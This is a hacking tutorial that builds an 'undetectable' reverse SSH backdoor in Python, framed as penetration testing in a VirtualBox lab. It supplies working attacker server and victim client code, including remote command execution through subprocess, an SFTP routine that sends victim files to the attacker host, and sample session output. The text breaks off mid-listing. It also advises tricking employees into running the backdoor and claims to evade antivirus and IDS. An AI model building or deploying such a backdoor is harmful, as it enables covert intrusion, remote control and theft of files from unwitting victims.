Creating An Undetectable Custom Ssh Backdoor In Python A Z

In such a situation, client-side attack and having knowledge in programming are your best friends. Why is that? A client-side attack is considered a very dangerous threat, especially when it’s combined with a coordinated social engineering attack against employees who are not aware of the IT security field. For example, no matter what your security rules are, if you can trick the right person into opening the wrong (malicious) software, the system may get compromised. In this article, we will create a simple but powerful and undetectable SSH backdoor written in Python with some built-in features like SFTP. At the final stage we will export this backdoor as a standalone and test it against online virus scanners as well as inside a simulated secure environment in VirtualBox. Why Python? Python is a hacker’s language, it’s very simple to learn, runs over multiple platforms, and has a wealth of third-party libraries out there, making your job much easier. After reading this article… You will have a great example of forging Python in penetration testing and you may use or tune the code for a real world case. Plus you will be aware of the effectiveness of client-side attack and the importance of programming your own weapon where other tools will fail in such a tough scenario.

Lab environment overview

Reflecting a real world scenario, let’s take a look into our network diagram, which I built in VBox to illustrate a secure environment:

Attacker machine >IP address : 10.0.2.15/24 >OS: BackTrack 5 R3 >Python Version: 2.6 Victim machine >IP address : 192.168.1.15/24 >OS: Windows 7 SP1 32 bit >Zone Alarm Firewall and anti-virus installed (free version) >Python Version: 2.7 (installed for demonstration only) Network infrastructure >Pfsense Firewall with SNORT IDS/IPS integrated service >Pfsense is NATing the victim machine [192.168.1.15] to its WAN interface [10.0.2.1] >2xVirtual switches created by VBox Building the machines from scratch inside VBox is out of our scope in this article; however, I have to briefly show you the configuration in case someone would like to replicate the scenario. Pfsense configuration *For WAN (outside) interface [10.0.2.1], all incoming traffic is denied by default unless it’s initiated from inside [LAN interface], simply because pfSense is a stateful firewall.

*For LAN (inside) interface [192.168.1.0/24], most likely you will see that only the necessary ports are allowed in the outbound direction, based on business needs. In this case, I assumed 80,443, and 22 will be allowed.

*All our inside clients [192.168.1.0/24] will be NATed to the WAN interface, so they will appear as 10.0.2.1 to the attacker machine.

*SNORT is watching traffic on both directions (inbound and outbound) for pfSense LAN & WAN interfaces.

*SNORT signatures are updated at the time of writing this article.

Note: In addition to the default enabled SNORT rules, I’ve manually enabled all the rules for the below categories because they are heavily focusing on malicious activity initiated from $HOME_NET (where Win 7 located) to the outside world $EXTERNAL_NET (where BT is located) :- GPLv2_community.rules Emerging-trojan.rules Emerging-malware.rules *Here we have Win 7 updated with history log:

*Zone alarm FW and anti-virus are up and running and its DB signature is updated as well.

Approach

How the attack works Building the SSH tunnel Reverse shell SFTP Write your own custom feature (grabbing a screenshot) Code wrap up into EXE Verification

How the attack works

The main key to have a successful client-side attack is to gain an employee’s trust to download and open your malicious software. There are too many ways to do this; during reconnaissance phase, you may search around and see what topics this employee is interested in. Maybe he/she has a post on Facebook asking for free software to download YouTube videos! Get my point here? I will leave this to your imagination, as every penetration tester has his own way. Once the victim opens ‘execute’ (your backdoor), a TCP SYN request will be initiated back to the attacker machine, which is supposed to be listening and waiting for incoming requests on port 22 to complete the TCP 3-way handshake and establish an SSH tunnel on the top of the TCP socket. Inside this secure channel, we will transfer arbitrary commands to our victim and make it send the execution result back to us. Encryption is a great way to evade IDS/IPS sensors since they will be completely blind about the traffic type that passed on. Making a ‘reverse shell’ is also a well-known method to bypass FW rules, as it is most likely blocking all incoming connections, but you can’t block all outbound connections since they are mandatory for business needs.

Building the SSH tunnel

Python has many third-party libraries that simplify SSH implementation and provide a high user level. I will use the Paramiko library, as it has fabulous features and allows us to program a simple client-server channel and much more! Before proceeding, I recommend you take a look into a folder called “demos” inside the Paramiko bundle. Paramiko’s author has done a great job in explaining how to use Paramiko in multiple scenarios through demo scripts. Files we are interested in:

*demo_server.py: a demo for a simple SSH Server [BackTrack in our case] *demo_simple.py: a demo for a simple SSH Client [Windows 7 in our case] *demo_sftp.py: a demo for a simple SFTP Client [Windows 7 in our case] *rforward.py: a demo for Reverse Port-Forwarding [Check challenge yourself section]

In this section, we will program the server & client-side and transfer simple strings over the SSH channel. Server side [python] import socket import paramiko import threading import sys host_key = paramiko.RSAKey(filename=’/root/Desktop/test_rsa.key’) class Server (paramiko.ServerInterface): def init(self): self.event = threading.Event() def check_channel_request(self, kind, chanid): if kind == ‘session’: return paramiko.OPEN_SUCCEEDED return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED def check_auth_password(self, username, password): if (username == ‘root’) and (password == ‘toor’): return paramiko.AUTH_SUCCESSFUL return paramiko.AUTH_FAILED try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((‘10.0.2.15’, 22)) sock.listen(100) print ‘[+] Listening for connection …’ client, addr = sock.accept() except Exception, e: print ‘[-] Listen/bind/accept failed: ‘ + str(e) sys.exit(1) print ‘[+] Got a connection!’ try: t = paramiko.Transport(client) try: t.load_server_moduli() except: print ‘[-] (Failed to load moduli — gex will be unsupported.)’ raise t.add_server_key(host_key) server = Server() try: t.start_server(server=server) except paramiko.SSHException, x: print ‘[-] SSH negotiation failed.’ chan = t.accept(20) print ‘[+] Authenticated!’ print chan.recv(1024) chan.send(‘Yeah i can see this’) except Exception, e: print ‘[-] Caught exception: ‘ + str(e. class ) + ‘: ‘ + str(e) try: t.close() except: pass sys.exit(1) [/python]

The code starts with defining the location for RSA key, which be used to sign and verify SSH2 data. I used the test_rsa.key that was packed inside the Paramiko bundle. ‘class Server’ defines an interface for controlling the behavior of Paramiko in server mode, and includes necessary functions that handle the requests coming from the client-side. For example, ‘def check_auth_password’ defines if a given username and password supplied by the client is correct during authentication. ‘def check_channel_request’ is called in our server when the client requests a channel. After authentication is complete, in this case we defined a ‘session’ channel type only to be allowed, other types would be [PTY, Shell] but remember that we won’t need the client (victim) to establish (or even request) a PTY/Shell terminal back to us, right? Next, we used ‘socket’, a built-in Python library for creating a TCP socket object named ‘sock’, and assign some options like (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) allowing us to bind an IP address that previously connected and left the socket in TIME_WAIT. Then we defined that we are binding our 10.0.2.15 interface address on port 22 and listening for 100 connections (in fact we are only interested in one connection from our victim). sock.accept() return a socket object stored in a variable called ‘client’. Finally we passed the ‘client’ socket object to ‘Transport’ class, which is responsible for negotiating an encrypted session, authenticating, and then creating stream tunnels called channel ‘chan’ across the session. We interact with our victim inside a channel through ‘chan.send’ and ‘chan.recv’ functions. If all went fine we should send (‘Yeah i can see this’) to the client and print out what the client has sent.

Client side In network programming, usually the client side is less complicated than the server side. You can notice this with four total lines needed to establish a channel. [python] import paramiko import threading client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(‘10.0.2.15′, username=’root’, password=’toor’) chan = client.get_transport().open_session() chan.send(‘Hey i am connected 🙂 ‘) print chan.recv(1024) client.close [/python]

SSHClient() class takes care of most aspects of authenticating and opening channels. paramiko.AutoAddPolicy() class automatically adds the hostname and server host key to the local ‘HostKeys’ object and saves it, so we won’t worry about the notification message about recognizing the server key fingerprint that appears when you first connect to an SSH server. Then we define the IP address of our attacking machine [10.0.2.15 ] with login credentials. ‘client.get_transport().open_session()’ requests a new channel of type ‘session’ from the server (still remember ‘def check_channel_request’ from the server code?). If all goes fine, we should send (‘Hey i am connected 🙂 ‘) to the server and print out what the server has sent.

Quick test Before moving on, I’ve already installed a Python compiler on the Windows 7 machine so we can quickly test our code, however in the last phase we will compile the whole code into single standalone EXE file which will be tested in our secure environment. *Starting the server script root@bt:~# python /root/Desktop/Server Part 1.py [+] Listening for connection … Verify a listening port on our Backtrack root@bt:~# netstat -antp | grep “22” tcp 0 10.0.2.15:22 0.0.0.0: LISTEN 1683/python *Starting the client script C:UsersHussamDesktop>python “Client Part 1.py” Yeah i can see this *Reviewing server side output root@bt:~# python /root/Desktop/Server Part 1.py [+] Listening for connection … [+] Got a connection! [+] Authenticated! Hey i am connected 🙂 Perfect, everything is working as expected we see the channel output on both sides as we programmed in the script.

Reverse shell

Paramiko is not designed to be used for penetration testing, the author ‘as others do’ supposed that the client will execute commands on the server and this occurs via the ‘chan.exec_command(command)’ function. However it’s reversed in our scenario since the server (hacker) is the one who will execute commands remotely on the client (victim). To overcome this, we will initiate a subprocess on the client side, and based on commands we received from the server via chan.recv() ,our client will send the output back via chan.send(). Server side #Add the following code after ‘chan.send(‘Yeah i can see this’)’ from the previous server script. [python] while True: command= raw_input(“Enter command: “).strip(‘n’) chan.send(command) print chan.recv(1024) + ‘n’ [/python] We just need to grab a command from the user via raw_input and send it to the client to execute it, then print out the result. Client side [python] import subprocess while True: command = chan.recv(1024) try: CMD = subprocess.check_output(command, shell=True) chan.send(CMD) except Exception,e: chan.send(str(e)) [/python] ‘subprocess.check_output’ execute the received command and return its output as a byte string to ‘CMD’ variable, which gets transferred back to server. Note that we use exception handling with ‘subprocess.check_output’ because if the attacker mistyped a command, this will raise an exception and we will lose our shell. We definitely don’t want this. Quick test *Start server script and then client script and issue some commands like ‘ipconfig,chdir’ to verify remote execution. [python] root@bt:~# python /root/Desktop/Server Part 2.py [+] Listening for connection … [+] Got a connection! [+] Authenticated! Hey i am connected 🙂 Enter command: ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::9012:530:e307:c322%11 IPv4 Address. . . . . . . . . . . : 192.168.1.15 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 Tunnel adapter isatap.{77D9EB79-91D3-45A9-A0BE-ED645CC08DF9}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter Teredo Tunneling Pseudo-Interface: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Enter command: chdir C:UsersHussamDesktop Enter command: arp -a Interface: 192.168.1.15 — 0xb Internet Address Physical Address Type 192.168.1.1 08-00-27-b3-a2-7d dynamic 192.168.1.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static [/python] Bingo! We have successfully executed commands remotely through the encrypted SSH channel. Let’s move on to do more actions.

SFTP

Transferring files with your victim becomes very handy, especially for post exploitation phases such as leaking sensitive documents or uploading software for pivoting. At this point we have multiple choices:

The worst: we can transfer files over the TCP socket, but this method may corrupt the file during transmission, especially if the file is large. As a matter of fact, this is why an entire protocol (FTP) was designed. The best: to program an SFTP server using Paramiko, but SFTP server programming can be quite difficult. The easiest: Fire up an OpenSSH server on a different hacking machine or bind it to a different NIC address. We need this because port 22 is reserved for our Python server on IP : 10.0.2.15.

SFTP server To avoid increasing code complexity on the server side, I will go for the last option and use OpenSSH with the following configuration: [python] root@bt:~# cat /etc/ssh/sshd_config … Port 22 ListenAddress 10.0.2.16 ChallengeResponseAuthentication no Subsystem sftp internal-sftp UsePAM no … [/python] SFTP client [python] def sftp(local_path,name): try: transport = paramiko.Transport((‘10.0.2.16’, 22)) transport.connect(username = ‘root’, password = ‘toor’) sftp = paramiko.SFTPClient.from_transport(transport) sftp.put(local_path, ‘/root/Desktop/SFTP-Upload/’+name) sftp.close() transport.close() return ‘[+] Done’ except Exception,e: return str(e) while True: command = chan.recv(1024) if ‘grab’ in command: grab,name,path = command.split(‘*’) chan.send( sftp(path,name) ) [/python]

Create a condition triggered by receiving a certain word ‘grab’ to indicate that we need to transfer a file from a victim machine. To transfer a file we need necessary parameters like file name, file path on victim machine, and the storing directory back on attacker side. The server has to send that information in a certain formula so we can split these parameters and pass it to our SFTP function. In this case, I used asterisk ‘’ to separate between these parameters. For example, on server side, if we send: grabphotoC:UsersHussamDesktopphoto.jpeg using split function we can break the above sentence into 3 variables based on ‘’ grab,name,path = command.split(‘*’)

grab variable will contain grab string we received from the server name variable will contain the file name to be uploaded in server side, in this case it’s photo path variable will contains the ‘photo’ path, in this case it’s C:UsersHussamDesktopphoto.jpeg

Once SFTP function got the path and file name, it will initiate a new SSH session on port 22 back to our BackTrack machine. After authentication and establishing an SSH tunnel we can start transferring the photo using FTP protocol and it will be saved in a pre-created directory called ‘/root/Desktop/SFTP-Upload/’ , thanks to sftp.put(local_path, ‘/root/Desktop/SFTP-Upload/’+name) If all went okay, SFTP function will return a ‘[+] Done’ string back to us through our previous channel, otherwise, it will print the exception occurred.

Quick test [python] root@bt:~# service ssh start ssh start/running, process 1578 root@bt:~# netstat -antp | grep “22” tcp 0 10.0.2.16.22 0.0.0.0:* LISTEN 1578/sshd root@bt:~# python /root/Desktop/Server Part 2.py [+] Listening for connection … [+] Got a connection! [+] Authenticated! Hey i am connected 🙂 Enter command: dir Data Volume in drive C has no label. Volume Serial Number is 1471-329C Directory of C:UsersHussamDesktopData 11/20/2013 07:27 PM